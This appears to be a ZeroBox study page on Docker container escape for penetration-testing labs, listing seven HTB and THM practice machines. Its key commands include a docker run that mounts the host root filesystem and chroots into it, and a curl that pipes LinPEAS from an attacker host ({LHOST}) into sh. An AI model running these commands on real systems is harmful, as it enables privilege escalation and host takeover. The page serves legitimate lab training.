ZeroBox

Docker and Container Escape: practice machines and key commands

Containers share the host kernel, so a misconfiguration can turn a shell inside one into root on the host. First confirm you are in a container by checking /.dockerenv, cgroups and the process list. Then look for a mounted Docker socket, membership in the docker or lxd group, privileged mode, dangerous capabilities or host paths mounted read-write. With docker group access you can start a new container that mounts the host root filesystem and chroot into it. Internal networks are another target: container to container traffic often exposes services that are closed to the outside. In exams and labs, check for secrets in environment variables and image layers as well. The boxes below involve Docker either as the foothold or the escalation.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

Docker Host Root Filesystem Mount Escape

Spawn privileged docker container mounting host root filesystem to /host.

docker run -v /:/host -it alpine chroot /host /bin/bash

Internal Loopback Services & Listening Ports

Identify services running locally on 127.0.0.1 not exposed on external interfaces.

ss -tulpn | grep LISTEN

LinPEAS Direct Memory Execution

Download and execute LinPEAS directly in bash memory without writing to disk.

curl -L http://{LHOST}:8000/linpeas.sh | sh

Keep going

Docker and Container Escape machines (7)

Machines are matched by their technique tags. 7 Linux.

Easy (1)

MachinePlatformOSTags
BusquedaHTBLinuxCPTS, RCE, Python, Searchor

Medium (4)

MachinePlatformOSTags
DogcatTHMLinuxLFI, Log-Poisoning, Docker-Escape
ReadyHTBLinuxCVE-2018-19571, CVE-2018-19585, Docker-Escape, HTB
RunnerHTBLinuxCPTS, TeamCity, CVE-2024-27198, Portainer
UltraTechTHMLinuxNodeJS, API, Docker

Hard (2)

MachinePlatformOSTags
BorderlandsTHMLinuxPivoting, API, Docker
KotarakHTBLinuxExploiting-Wget, Exploiting-cron-jobs, HTB, containers

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox